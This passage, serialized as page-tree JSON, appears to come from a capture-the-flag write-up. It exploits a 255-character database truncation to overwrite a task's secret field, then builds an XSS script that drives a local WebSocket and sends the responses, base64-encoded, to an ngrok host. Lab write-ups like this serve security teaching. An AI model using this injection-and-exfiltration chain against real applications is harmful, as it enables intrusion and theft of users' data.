ws",{"type":33,"tag":128,"props":51157,"children":51158},{"style":312},[51159],{"type":38,"value":215},{"type":33,"tag":128,"props":51161,"children":51162},{"style":135},[51163],{"type":38,"value":23433},{"type":33,"tag":128,"props":51165,"children":51166},{"style":312},[51167],{"type":38,"value":5566},{"type":33,"tag":128,"props":51169,"children":51170},{"style":306},[51171],{"type":38,"value":6301},{"type":33,"tag":128,"props":51173,"children":51174},{"style":312},[51175],{"type":38,"value":215},{"type":33,"tag":128,"props":51177,"children":51178},{"style":135},[51179],{"type":38,"value":49561},{"type":33,"tag":128,"props":51181,"children":51182},{"style":312},[51183],{"type":38,"value":5836},{"type":33,"tag":128,"props":51185,"children":51186},{"style":437},[51187],{"type":38,"value":5841},{"type":33,"tag":128,"props":51189,"children":51190},{"style":312},[51191],{"type":38,"value":284},{"type":33,"tag":128,"props":51193,"children":51194},{"style":1576},[51195],{"type":38,"value":5850},{"type":33,"tag":128,"props":51197,"children":51198},{"style":312
},[51199],{"type":38,"value":5584},{"type":33,"tag":128,"props":51201,"children":51202},{"style":437},[51203],{"type":38,"value":14849},{"type":33,"tag":128,"props":51205,"children":51206},{"style":312},[51207],{"type":38,"value":284},{"type":33,"tag":128,"props":51209,"children":51210},{"style":676},[51211],{"type":38,"value":6739},{"type":33,"tag":128,"props":51213,"children":51214},{"style":140},[51215],{"type":38,"value":49388},{"type":33,"tag":128,"props":51217,"children":51218},{"style":676},[51219],{"type":38,"value":6040},{"type":33,"tag":128,"props":51221,"children":51222},{"style":312},[51223],{"type":38,"value":14256},{"type":33,"tag":128,"props":51225,"children":51226},{"class":130,"line":765},[51227,51231,51235,51239,51243,51247],{"type":33,"tag":128,"props":51228,"children":51229},{"style":312},[51230],{"type":38,"value":14264},{"type":33,"tag":128,"props":51232,"children":51233},{"style":1576},[51234],{"type":38,"value":6855},{"type":33,"tag":128,"props":51236,"children":51237},{"style":312},[51238],{"type":38,"value":2852},{"type":33,"tag":128,"props":51240,"children":51241},{"style":306},[51242],{"type":38,"value":23474},{"type":33,"tag":128,"props":51244,"children":51245},{"style":312},[51246],{"type":38,"value":2966},{"type":33,"tag":128,"props":51248,"children":51249},{"style":312},[51250],{"type":38,"value":762},{"type":33,"tag":128,"props":51252,"children":51253},{"class":130,"line":804},[51254,51258,51262,51266,51270,51274,51278,51282,51286,51290,51294,51298,51302,51306,51310,51314,51318,51322],{"type":33,"tag":128,"props":51255,"children":51256},{"style":306},[51257],{"type":38,"value":51155},{"type":33,"tag":128,"props":51259,"children":51260},{"style":312},[51261],{"type":38,"value":215},{"type":33,"tag":128,"props":51263,"children":51264},{"style":135},[51265],{"type":38,"value":23433},{"type":33,"tag":128,"props":51267,"children":51268},{"style":312},[51269],{"type":38,"value":5566},{"type":33,"tag":128,"props":51271,"children":51272},{"s
tyle":306},[51273],{"type":38,"value":6301},{"type":33,"tag":128,"props":51275,"children":51276},{"style":312},[51277],{"type":38,"value":215},{"type":33,"tag":128,"props":51279,"children":51280},{"style":135},[51281],{"type":38,"value":49561},{"type":33,"tag":128,"props":51283,"children":51284},{"style":312},[51285],{"type":38,"value":5836},{"type":33,"tag":128,"props":51287,"children":51288},{"style":437},[51289],{"type":38,"value":5841},{"type":33,"tag":128,"props":51291,"children":51292},{"style":312},[51293],{"type":38,"value":284},{"type":33,"tag":128,"props":51295,"children":51296},{"style":1576},[51297],{"type":38,"value":6721},{"type":33,"tag":128,"props":51299,"children":51300},{"style":312},[51301],{"type":38,"value":5584},{"type":33,"tag":128,"props":51303,"children":51304},{"style":437},[51305],{"type":38,"value":14849},{"type":33,"tag":128,"props":51307,"children":51308},{"style":312},[51309],{"type":38,"value":284},{"type":33,"tag":128,"props":51311,"children":51312},{"style":676},[51313],{"type":38,"value":6739},{"type":33,"tag":128,"props":51315,"children":51316},{"style":140},[51317],{"type":38,"value":49388},{"type":33,"tag":128,"props":51319,"children":51320},{"style":676},[51321],{"type":38,"value":6040},{"type":33,"tag":128,"props":51323,"children":51324},{"style":312},[51325],{"type":38,"value":14256},{"type":33,"tag":128,"props":51327,"children":51328},{"class":130,"line":839},[51329],{"type":33,"tag":128,"props":51330,"children":51331},{"style":312},[51332],{"type":38,"value":6760},{"type":33,"tag":128,"props":51334,"children":51335},{"class":130,"line":848},[51336],{"type":33,"tag":128,"props":51337,"children":51338},{"style":312},[51339],{"type":38,"value":854},{"type":33,"tag":40,"props":51341,"children":51343},{"id":51342},"data-column",[51344,51349],{"type":33,"tag":105,"props":51345,"children":51347},{"className":51346},[],[51348],{"type":38,"value":2815},{"type":38,"value":51350}," 
column",{"type":33,"tag":47,"props":51352,"children":51353},{},[51354,51355,51360],{"type":38,"value":2766},{"type":33,"tag":105,"props":51356,"children":51358},{"className":51357},[],[51359],{"type":38,"value":2815},{"type":38,"value":51361}," column has this definition:",{"type":33,"tag":114,"props":51363,"children":51364},{"lang":10492},[51365],{"type":33,"tag":119,"props":51366,"children":51368},{"code":51367,"language":10492,"meta":8,"className":41205,"style":8},"data VARCHAR(255) NOT NULL,\n",[51369],{"type":33,"tag":105,"props":51370,"children":51371},{"__ignoreMap":8},[51372],{"type":33,"tag":128,"props":51373,"children":51374},{"class":130,"line":131},[51375,51379,51383,51387,51391,51395,51399],{"type":33,"tag":128,"props":51376,"children":51377},{"style":1576},[51378],{"type":38,"value":2815},{"type":33,"tag":128,"props":51380,"children":51381},{"style":300},[51382],{"type":38,"value":46128},{"type":33,"tag":128,"props":51384,"children":51385},{"style":323},[51386],{"type":38,"value":5566},{"type":33,"tag":128,"props":51388,"children":51389},{"style":523},[51390],{"type":38,"value":46102},{"type":33,"tag":128,"props":51392,"children":51393},{"style":323},[51394],{"type":38,"value":10105},{"type":33,"tag":128,"props":51396,"children":51397},{"style":1576},[51398],{"type":38,"value":46111},{"type":33,"tag":128,"props":51400,"children":51401},{"style":323},[51402],{"type":38,"value":693},{"type":33,"tag":47,"props":51404,"children":51405},{},[51406,51408,51413],{"type":38,"value":51407},"So we can't store more than 255 characters. If we try to store more than 255 characters, the content will be truncated. This is really convenient, because our big problem is that we don't have the key to decrypt the data. 
With this we will be able to overwrite the ",{"type":33,"tag":105,"props":51409,"children":51411},{"className":51410},[],[51412],{"type":38,"value":46812},{"type":38,"value":50968},{"type":33,"tag":40,"props":51415,"children":51417},{"id":51416},"constructing-our-payload",[51418],{"type":38,"value":51419},"Constructing our payload",{"type":33,"tag":47,"props":51421,"children":51422},{},[51423],{"type":38,"value":51424},"We know that this line is used to insert into the database, and that there is no protection against long strings.",{"type":33,"tag":114,"props":51426,"children":51427},{"lang":5526},[51428],{"type":33,"tag":119,"props":51429,"children":51431},{"code":51430,"language":5526,"meta":8,"className":5530,"style":8},"await db.addTask(userId, `{\"title\":\"${data.title}\",\"description\":\"${data.description}\",\"secret\":\"${secret}\"}`);\n",[51432],{"type":33,"tag":105,"props":51433,"children":51434},{"__ignoreMap":8},[51435],{"type":33,"tag":128,"props":51436,"children":51437},{"class":130,"line":131},[51438,51443,51447,51451,51455,51459,51463,51467,51471,51475,51479,51483,51487,51491,51495,51499,51503,51507,51511,51515,51519,51523,51527,51531,51535,51539,51543],{"type":33,"tag":128,"props":51439,"children":51440},{"style":1576},[51441],{"type":38,"value":51442},"await",{"type":33,"tag":128,"props":51444,"children":51445},{"style":306},[51446],{"type":38,"value":46507},{"type":33,"tag":128,"props":51448,"children":51449},{"style":312},[51450],{"type":38,"value":215},{"type":33,"tag":128,"props":51452,"children":51453},{"style":135},[51454],{"type":38,"value":49432},{"type":33,"tag":128,"props":51456,"children":51457},{"style":312},[51458],{"type":38,"value":5566},{"type":33,"tag":128,"props":51460,"children":51461},{"style":306},[51462],{"type":38,"value":6566},{"type":33,"tag":128,"props":51464,"children":51465},{"style":312},[51466],{"type":38,"value":5584},{"type":33,"tag":128,"props":51468,"children":51469},{"style":676},[51470],{"type":38,"value":5710},{"type":33,"
tag":128,"props":51472,"children":51473},{"style":140},[51474],{"type":38,"value":49453},{"type":33,"tag":128,"props":51476,"children":51477},{"style":1576},[51478],{"type":38,"value":5720},{"type":33,"tag":128,"props":51480,"children":51481},{"style":140},[51482],{"type":38,"value":2815},{"type":33,"tag":128,"props":51484,"children":51485},{"style":312},[51486],{"type":38,"value":215},{"type":33,"tag":128,"props":51488,"children":51489},{"style":140},[51490],{"type":38,"value":776},{"type":33,"tag":128,"props":51492,"children":51493},{"style":1576},[51494],{"type":38,"value":5730},{"type":33,"tag":128,"props":51496,"children":51497},{"style":140},[51498],{"type":38,"value":49478},{"type":33,"tag":128,"props":51500,"children":51501},{"style":1576},[51502],{"type":38,"value":5720},{"type":33,"tag":128,"props":51504,"children":51505},{"style":140},[51506],{"type":38,"value":2815},{"type":33,"tag":128,"props":51508,"children":51509},{"style":312},[51510],{"type":38,"value":215},{"type":33,"tag":128,"props":51512,"children":51513},{"style":140},[51514],{"type":38,"value":12236},{"type":33,"tag":128,"props":51516,"children":51517},{"style":1576},[51518],{"type":38,"value":5730},{"type":33,"tag":128,"props":51520,"children":51521},{"style":140},[51522],{"type":38,"value":49503},{"type":33,"tag":128,"props":51524,"children":51525},{"style":1576},[51526],{"type":38,"value":5720},{"type":33,"tag":128,"props":51528,"children":51529},{"style":140},[51530],{"type":38,"value":46812},{"type":33,"tag":128,"props":51532,"children":51533},{"style":1576},[51534],{"type":38,"value":5730},{"type":33,"tag":128,"props":51536,"children":51537},{"style":140},[51538],{"type":38,"value":49520},{"type":33,"tag":128,"props":51540,"children":51541},{"style":676},[51542],{"type":38,"value":5739},{"type":33,"tag":128,"props":51544,"children":51545},{"style":312},[51546],{"type":38,"value":5815},{"type":33,"tag":47,"props":51548,"children":51549},{},[51550,51552,51557],{"type":38,"value":51551},"W
e need to calculate the offset to generate our payload, so that we can write what we want into the ",{"type":33,"tag":105,"props":51553,"children":51555},{"className":51554},[],[51556],{"type":38,"value":2815},{"type":38,"value":51558}," column.",{"type":33,"tag":47,"props":51560,"children":51561},{},[51562],{"type":38,"value":51563},"We need to keep these elements, and we need to generate a secret.",{"type":33,"tag":114,"props":51565,"children":51566},{},[51567],{"type":33,"tag":119,"props":51568,"children":51570},{"code":51569},"{\"title\":\"a\", => 13\n\"description\":\"\", => 17\n\"secret\":\"f3eeaa82370f7e9bfbc2caf16f6d19b7\",} => 45\n",[51571],{"type":33,"tag":105,"props":51572,"children":51573},{"__ignoreMap":8},[51574],{"type":38,"value":51569},{"type":33,"tag":47,"props":51576,"children":51577},{},[51578],{"type":38,"value":51579},"13 + 17 + 45 => 75\n255 - (75 - 1) => 181",{"type":33,"tag":47,"props":51581,"children":51582},{},[51583,51585,51590],{"type":38,"value":51584},"We subtract one from our result because we want to close the string at the end of the description.\nIf we look back at the line of ",{"type":33,"tag":105,"props":51586,"children":51588},{"className":51587},[],[51589],{"type":38,"value":48750},{"type":38,"value":284},{"type":33,"tag":114,"props":51592,"children":51593},{"lang":5526},[51594],{"type":33,"tag":119,"props":51595,"children":51597},{"code":51596,"language":5526,"meta":8,"className":5530,"style":8},"await db.addTask(userId, 
`{\"title\":\"${data.title}\",\"description\":\"${data.description}\u003CSTOP_HERE>\",\"secret\":\"${secret}\"}`);\n",[51598],{"type":33,"tag":105,"props":51599,"children":51600},{"__ignoreMap":8},[51601],{"type":33,"tag":128,"props":51602,"children":51603},{"class":130,"line":131},[51604,51608,51612,51616,51620,51624,51628,51632,51636,51640,51644,51648,51652,51656,51660,51664,51668,51672,51676,51680,51684,51689,51693,51697,51701,51705,51709],{"type":33,"tag":128,"props":51605,"children":51606},{"style":1576},[51607],{"type":38,"value":51442},{"type":33,"tag":128,"props":51609,"children":51610},{"style":306},[51611],{"type":38,"value":46507},{"type":33,"tag":128,"props":51613,"children":51614},{"style":312},[51615],{"type":38,"value":215},{"type":33,"tag":128,"props":51617,"children":51618},{"style":135},[51619],{"type":38,"value":49432},{"type":33,"tag":128,"props":51621,"children":51622},{"style":312},[51623],{"type":38,"value":5566},{"type":33,"tag":128,"props":51625,"children":51626},{"style":306},[51627],{"type":38,"value":6566},{"type":33,"tag":128,"props":51629,"children":51630},{"style":312},[51631],{"type":38,"value":5584},{"type":33,"tag":128,"props":51633,"children":51634},{"style":676},[51635],{"type":38,"value":5710},{"type":33,"tag":128,"props":51637,"children":51638},{"style":140},[51639],{"type":38,"value":49453},{"type":33,"tag":128,"props":51641,"children":51642},{"style":1576},[51643],{"type":38,"value":5720},{"type":33,"tag":128,"props":51645,"children":51646},{"style":140},[51647],{"type":38,"value":2815},{"type":33,"tag":128,"props":51649,"children":51650},{"style":312},[51651],{"type":38,"value":215},{"type":33,"tag":128,"props":51653,"children":51654},{"style":140},[51655],{"type":38,"value":776},{"type":33,"tag":128,"props":51657,"children":51658},{"style":1576},[51659],{"type":38,"value":5730},{"type":33,"tag":128,"props":51661,"children":51662},{"style":140},[51663],{"type":38,"value":49478},{"type":33,"tag":128,"props":51665,"children":51
666},{"style":1576},[51667],{"type":38,"value":5720},{"type":33,"tag":128,"props":51669,"children":51670},{"style":140},[51671],{"type":38,"value":2815},{"type":33,"tag":128,"props":51673,"children":51674},{"style":312},[51675],{"type":38,"value":215},{"type":33,"tag":128,"props":51677,"children":51678},{"style":140},[51679],{"type":38,"value":12236},{"type":33,"tag":128,"props":51681,"children":51682},{"style":1576},[51683],{"type":38,"value":5730},{"type":33,"tag":128,"props":51685,"children":51686},{"style":140},[51687],{"type":38,"value":51688},"\u003CSTOP_HERE>\",\"secret\":\"",{"type":33,"tag":128,"props":51690,"children":51691},{"style":1576},[51692],{"type":38,"value":5720},{"type":33,"tag":128,"props":51694,"children":51695},{"style":140},[51696],{"type":38,"value":46812},{"type":33,"tag":128,"props":51698,"children":51699},{"style":1576},[51700],{"type":38,"value":5730},{"type":33,"tag":128,"props":51702,"children":51703},{"style":140},[51704],{"type":38,"value":49520},{"type":33,"tag":128,"props":51706,"children":51707},{"style":676},[51708],{"type":38,"value":5739},{"type":33,"tag":128,"props":51710,"children":51711},{"style":312},[51712],{"type":38,"value":5815},{"type":33,"tag":114,"props":51714,"children":51715},{"lang":116},[51716],{"type":33,"tag":119,"props":51717,"children":51719},{"code":51718,"language":116,"meta":8,"className":121,"style":8},"python -c \"print('A'*181)\" | 
pbcopy\n",[51720],{"type":33,"tag":105,"props":51721,"children":51722},{"__ignoreMap":8},[51723],{"type":33,"tag":128,"props":51724,"children":51725},{"class":130,"line":131},[51726,51730,51734,51738,51743,51747,51751],{"type":33,"tag":128,"props":51727,"children":51728},{"style":135},[51729],{"type":38,"value":10227},{"type":33,"tag":128,"props":51731,"children":51732},{"style":151},[51733],{"type":38,"value":8707},{"type":33,"tag":128,"props":51735,"children":51736},{"style":676},[51737],{"type":38,"value":679},{"type":33,"tag":128,"props":51739,"children":51740},{"style":140},[51741],{"type":38,"value":51742},"print('A'*181)",{"type":33,"tag":128,"props":51744,"children":51745},{"style":676},[51746],{"type":38,"value":669},{"type":33,"tag":128,"props":51748,"children":51749},{"style":300},[51750],{"type":38,"value":10195},{"type":33,"tag":128,"props":51752,"children":51753},{"style":135},[51754],{"type":38,"value":51755}," pbcopy\n",{"type":33,"tag":47,"props":51757,"children":51758},{},[51759],{"type":38,"value":51760},"So we have our payload:",{"type":33,"tag":114,"props":51762,"children":51763},{"lang":633},[51764],{"type":33,"tag":119,"props":51765,"children":51767},{"code":51766,"language":633,"meta":8,"className":637,"style":8},"{\n  \"action\": \"add\",\n  \"title\":\"a\",\n  \"description\": 
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\",\\\"secret\\\":\\\"f3eeaa82370f7e9bfbc2caf16f6d19b7\"\n}\n",[51768],{"type":33,"tag":105,"props":51769,"children":51770},{"__ignoreMap":8},[51771,51778,51813,51848,51913],{"type":33,"tag":128,"props":51772,"children":51773},{"class":130,"line":131},[51774],{"type":33,"tag":128,"props":51775,"children":51776},{"style":312},[51777],{"type":38,"value":650},{"type":33,"tag":128,"props":51779,"children":51780},{"class":130,"line":362},[51781,51785,51789,51793,51797,51801,51805,51809],{"type":33,"tag":128,"props":51782,"children":51783},{"style":656},[51784],{"type":38,"value":659},{"type":33,"tag":128,"props":51786,"children":51787},{"style":437},[51788],{"type":38,"value":12513},{"type":33,"tag":128,"props":51790,"children":51791},{"style":656},[51792],{"type":38,"value":669},{"type":33,"tag":128,"props":51794,"children":51795},{"style":312},[51796],{"type":38,"value":284},{"type":33,"tag":128,"props":51798,"children":51799},{"style":676},[51800],{"type":38,"value":679},{"type":33,"tag":128,"props":51802,"children":51803},{"style":140},[51804],{"type":38,"value":49388},{"type":33,"tag":128,"props":51806,"children":51807},{"style":676},[51808],{"type":38,"value":669},{"type":33,"tag":128,"props":51810,"children":51811},{"style":312},[51812],{"type":38,"value":693},{"type":33,"tag":128,"props":51814,"children":51815},{"class":130,"line":403},[51816,51820,51824,51828,51832,51836,51840,51844],{"type":33,"tag":128,"props":51817,"children":51818},{"style":656},[51819],{"type":38,"value":659},{"type":33,"tag":128,"props":51821,"children":51822},{"style":437},[51823],{"type":38,"value":776},{"type":33,"tag":128,"props":51825,"children":51826},{"style":656},[51827],{"type":38,"value":669},{"type":33,"tag":128,"props":51829,"children":51830},{"style":312},[51831],{"type":38,"value":284},{"type":
33,"tag":128,"props":51833,"children":51834},{"style":676},[51835],{"type":38,"value":669},{"type":33,"tag":128,"props":51837,"children":51838},{"style":140},[51839],{"type":38,"value":53},{"type":33,"tag":128,"props":51841,"children":51842},{"style":676},[51843],{"type":38,"value":669},{"type":33,"tag":128,"props":51845,"children":51846},{"style":312},[51847],{"type":38,"value":693},{"type":33,"tag":128,"props":51849,"children":51850},{"class":130,"line":739},[51851,51855,51859,51863,51867,51871,51876,51880,51884,51888,51892,51896,51900,51904,51909],{"type":33,"tag":128,"props":51852,"children":51853},{"style":656},[51854],{"type":38,"value":659},{"type":33,"tag":128,"props":51856,"children":51857},{"style":437},[51858],{"type":38,"value":12236},{"type":33,"tag":128,"props":51860,"children":51861},{"style":656},[51862],{"type":38,"value":669},{"type":33,"tag":128,"props":51864,"children":51865},{"style":312},[51866],{"type":38,"value":284},{"type":33,"tag":128,"props":51868,"children":51869},{"style":676},[51870],{"type":38,"value":679},{"type":33,"tag":128,"props":51872,"children":51873},{"style":140},[51874],{"type":38,"value":51875},"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",{"type":33,"tag":128,"props":51877,"children":51878},{"style":151},[51879],{"type":38,"value":10544},{"type":33,"tag":128,"props":51881,"children":51882},{"style":140},[51883],{"type":38,"value":5584},{"type":33,"tag":128,"props":51885,"children":51886},{"style":151},[51887],{"type":38,"value":10544},{"type":33,"tag":128,"props":51889,"children":51890},{"style":140},[51891],{"type":38,"value":46812},{"type":33,"tag":128,"props":51893,"children":51894},{"style":151},[51895],{"type":38,"value":10544},{"type":33,"tag":128,"props":51897,"children":51898},{"style":140},[51899],{"type":38,"value":284},{"type":33,"tag":128,"props":51901,"children":51902},{"sty
le":151},[51903],{"type":38,"value":10544},{"type":33,"tag":128,"props":51905,"children":51906},{"style":140},[51907],{"type":38,"value":51908},"f3eeaa82370f7e9bfbc2caf16f6d19b7",{"type":33,"tag":128,"props":51910,"children":51911},{"style":676},[51912],{"type":38,"value":836},{"type":33,"tag":128,"props":51914,"children":51915},{"class":130,"line":765},[51916],{"type":33,"tag":128,"props":51917,"children":51918},{"style":312},[51919],{"type":38,"value":854},{"type":33,"tag":40,"props":51921,"children":51922},{"id":21053},[51923],{"type":38,"value":21056},{"type":33,"tag":47,"props":51925,"children":51926},{},[51927,51929,51934,51936,51941],{"type":38,"value":51928},"We need to generate a script to be triggered by the ",{"type":33,"tag":105,"props":51930,"children":51932},{"className":51931},[],[51933],{"type":38,"value":47399},{"type":38,"value":51935}," script with the xss vuln on the first service.\nWe also need to setup an ",{"type":33,"tag":53,"props":51937,"children":51939},{"href":43936,"rel":51938},[57],[51940],{"type":38,"value":43940},{"type":38,"value":51942}," with ngrok to get command output.",{"type":33,"tag":114,"props":51944,"children":51945},{"lang":5526},[51946],{"type":33,"tag":119,"props":51947,"children":51949},{"code":51948,"language":5526,"meta":8,"className":5530,"style":8},"\u003Cscript>\nconst s = async () => {\n  const w = new WebSocket(`ws://127.0.0.1/ws`);\n  w.onopen = async () => {\n    w.send(JSON.stringify({action:'add',title:\"a\",description: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\"secret\":\"f3eeaa82370f7e9bfbc2caf16f6d19b7\"}'}));\n    setTimeout(() => {w.send(JSON.stringify({action:'get'}));}, 1000);\n  };\n  w.onmessage = async (msg) => {\n    fetch(`http://0c5f-91-69-133-214.ngrok.io/exploit/${btoa(msg.data)}`, {mode: 'no-cors'});\n  
};\n};\ns();\n\u003C/script>\n",[51950],{"type":33,"tag":105,"props":51951,"children":51952},{"__ignoreMap":8},[51953,51968,51980,52030,52067,52177,52263,52274,52318,52410,52421,52432,52440],{"type":33,"tag":128,"props":51954,"children":51955},{"class":130,"line":131},[51956,51960,51964],{"type":33,"tag":128,"props":51957,"children":51958},{"style":312},[51959],{"type":38,"value":5977},{"type":33,"tag":128,"props":51961,"children":51962},{"style":1576},[51963],{"type":38,"value":15064},{"type":33,"tag":128,"props":51965,"children":51966},{"style":312},[51967],{"type":38,"value":6097},{"type":33,"tag":128,"props":51969,"children":51970},{"class":130,"line":362},[51971,51976],{"type":33,"tag":128,"props":51972,"children":51973},{"style":323},[51974],{"type":38,"value":51975},"const s = async () => ",{"type":33,"tag":128,"props":51977,"children":51978},{"style":312},[51979],{"type":38,"value":650},{"type":33,"tag":128,"props":51981,"children":51982},{"class":130,"line":403},[51983,51987,51992,51996,52000,52005,52009,52013,52018,52022,52026],{"type":33,"tag":128,"props":51984,"children":51985},{"style":306},[51986],{"type":38,"value":5637},{"type":33,"tag":128,"props":51988,"children":51989},{"style":306},[51990],{"type":38,"value":51991}," w",{"type":33,"tag":128,"props":51993,"children":51994},{"style":312},[51995],{"type":38,"value":5657},{"type":33,"tag":128,"props":51997,"children":51998},{"style":300},[51999],{"type":38,"value":13061},{"type":33,"tag":128,"props":52001,"children":52002},{"style":135},[52003],{"type":38,"value":52004}," 
WebSocket",{"type":33,"tag":128,"props":52006,"children":52007},{"style":312},[52008],{"type":38,"value":5566},{"type":33,"tag":128,"props":52010,"children":52011},{"style":676},[52012],{"type":38,"value":5739},{"type":33,"tag":128,"props":52014,"children":52015},{"style":140},[52016],{"type":38,"value":52017},"ws://127.0.0.1/ws",{"type":33,"tag":128,"props":52019,"children":52020},{"style":676},[52021],{"type":38,"value":5739},{"type":33,"tag":128,"props":52023,"children":52024},{"style":312},[52025],{"type":38,"value":2966},{"type":33,"tag":128,"props":52027,"children":52028},{"style":323},[52029],{"type":38,"value":5676},{"type":33,"tag":128,"props":52031,"children":52032},{"class":130,"line":739},[52033,52038,52042,52047,52051,52055,52059,52063],{"type":33,"tag":128,"props":52034,"children":52035},{"style":306},[52036],{"type":38,"value":52037},"  w",{"type":33,"tag":128,"props":52039,"children":52040},{"style":312},[52041],{"type":38,"value":215},{"type":33,"tag":128,"props":52043,"children":52044},{"style":135},[52045],{"type":38,"value":52046},"onopen",{"type":33,"tag":128,"props":52048,"children":52049},{"style":312},[52050],{"type":38,"value":5657},{"type":33,"tag":128,"props":52052,"children":52053},{"style":300},[52054],{"type":38,"value":5598},{"type":33,"tag":128,"props":52056,"children":52057},{"style":312},[52058],{"type":38,"value":13259},{"type":33,"tag":128,"props":52060,"children":52061},{"style":312},[52062],{"type":38,"value":5625},{"type":33,"tag":128,"props":52064,"children":52065},{"style":312},[52066],{"type":38,"value":762},{"type":33,"tag":128,"props":52068,"children":52069},{"class":130,"line":765},[52070,52075,52079,52083,52087,52091,52095,52099,52103,52107,52111,52115,52119,52123,52127,52131,52135,52139,52143,52147,52151,52155,52159,52163,52168,52172],{"type":33,"tag":128,"props":52071,"children":52072},{"style":306},[52073],{"type":38,"value":52074},"    
w",{"type":33,"tag":128,"props":52076,"children":52077},{"style":312},[52078],{"type":38,"value":215},{"type":33,"tag":128,"props":52080,"children":52081},{"style":135},[52082],{"type":38,"value":23433},{"type":33,"tag":128,"props":52084,"children":52085},{"style":312},[52086],{"type":38,"value":5566},{"type":33,"tag":128,"props":52088,"children":52089},{"style":306},[52090],{"type":38,"value":6301},{"type":33,"tag":128,"props":52092,"children":52093},{"style":312},[52094],{"type":38,"value":215},{"type":33,"tag":128,"props":52096,"children":52097},{"style":135},[52098],{"type":38,"value":49561},{"type":33,"tag":128,"props":52100,"children":52101},{"style":312},[52102],{"type":38,"value":5836},{"type":33,"tag":128,"props":52104,"children":52105},{"style":437},[52106],{"type":38,"value":12513},{"type":33,"tag":128,"props":52108,"children":52109},{"style":312},[52110],{"type":38,"value":284},{"type":33,"tag":128,"props":52112,"children":52113},{"style":676},[52114],{"type":38,"value":6040},{"type":33,"tag":128,"props":52116,"children":52117},{"style":140},[52118],{"type":38,"value":49388},{"type":33,"tag":128,"props":52120,"children":52121},{"style":676},[52122],{"type":38,"value":6040},{"type":33,"tag":128,"props":52124,"children":52125},{"style":312},[52126],{"type":38,"value":5584},{"type":33,"tag":128,"props":52128,"children":52129},{"style":437},[52130],{"type":38,"value":776},{"type":33,"tag":128,"props":52132,"children":52133},{"style":312},[52134],{"type":38,"value":284},{"type":33,"tag":128,"props":52136,"children":52137},{"style":676},[52138],{"type":38,"value":669},{"type":33,"tag":128,"props":52140,"children":52141},{"style":140},[52142],{"type":38,"value":53},{"type":33,"tag":128,"props":52144,"children":52145},{"style":676},[52146],{"type":38,"value":669},{"type":33,"tag":128,"props":52148,"children":52149},{"style":312},[52150],{"type":38,"value":5584},{"type":33,"tag":128,"props":52152,"children":52153},{"style":437},[52154],{"type":38,"value":12236},{
"type":33,"tag":128,"props":52156,"children":52157},{"style":312},[52158],{"type":38,"value":284},{"type":33,"tag":128,"props":52160,"children":52161},{"style":676},[52162],{"type":38,"value":6739},{"type":33,"tag":128,"props":52164,"children":52165},{"style":140},[52166],{"type":38,"value":52167},"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\"secret\":\"f3eeaa82370f7e9bfbc2caf16f6d19b7\"}",{"type":33,"tag":128,"props":52169,"children":52170},{"style":676},[52171],{"type":38,"value":6040},{"type":33,"tag":128,"props":52173,"children":52174},{"style":312},[52175],{"type":38,"value":52176},"}));\n",{"type":33,"tag":128,"props":52178,"children":52179},{"class":130,"line":804},[52180,52185,52189,52193,52197,52202,52206,52210,52214,52218,52222,52226,52230,52234,52238,52242,52246,52250,52255,52259],{"type":33,"tag":128,"props":52181,"children":52182},{"style":135},[52183],{"type":38,"value":52184},"    
setTimeout",{"type":33,"tag":128,"props":52186,"children":52187},{"style":312},[52188],{"type":38,"value":8135},{"type":33,"tag":128,"props":52190,"children":52191},{"style":312},[52192],{"type":38,"value":5625},{"type":33,"tag":128,"props":52194,"children":52195},{"style":312},[52196],{"type":38,"value":5642},{"type":33,"tag":128,"props":52198,"children":52199},{"style":306},[52200],{"type":38,"value":52201},"w",{"type":33,"tag":128,"props":52203,"children":52204},{"style":312},[52205],{"type":38,"value":215},{"type":33,"tag":128,"props":52207,"children":52208},{"style":135},[52209],{"type":38,"value":23433},{"type":33,"tag":128,"props":52211,"children":52212},{"style":312},[52213],{"type":38,"value":5566},{"type":33,"tag":128,"props":52215,"children":52216},{"style":306},[52217],{"type":38,"value":6301},{"type":33,"tag":128,"props":52219,"children":52220},{"style":312},[52221],{"type":38,"value":215},{"type":33,"tag":128,"props":52223,"children":52224},{"style":135},[52225],{"type":38,"value":49561},{"type":33,"tag":128,"props":52227,"children":52228},{"style":312},[52229],{"type":38,"value":5836},{"type":33,"tag":128,"props":52231,"children":52232},{"style":437},[52233],{"type":38,"value":12513},{"type":33,"tag":128,"props":52235,"children":52236},{"style":312},[52237],{"type":38,"value":284},{"type":33,"tag":128,"props":52239,"children":52240},{"style":676},[52241],{"type":38,"value":6040},{"type":33,"tag":128,"props":52243,"children":52244},{"style":140},[52245],{"type":38,"value":13526},{"type":33,"tag":128,"props":52247,"children":52248},{"style":676},[52249],{"type":38,"value":6040},{"type":33,"tag":128,"props":52251,"children":52252},{"style":312},[52253],{"type":38,"value":52254},"}));},",{"type":33,"tag":128,"props":52256,"children":52257},{"style":523},[52258],{"type":38,"value":8408},{"type":33,"tag":128,"props":52260,"children":52261},{"style":312},[52262],{"type":38,"value":5815},{"type":33,"tag":128,"props":52264,"children":52265},{"class":130,"line"
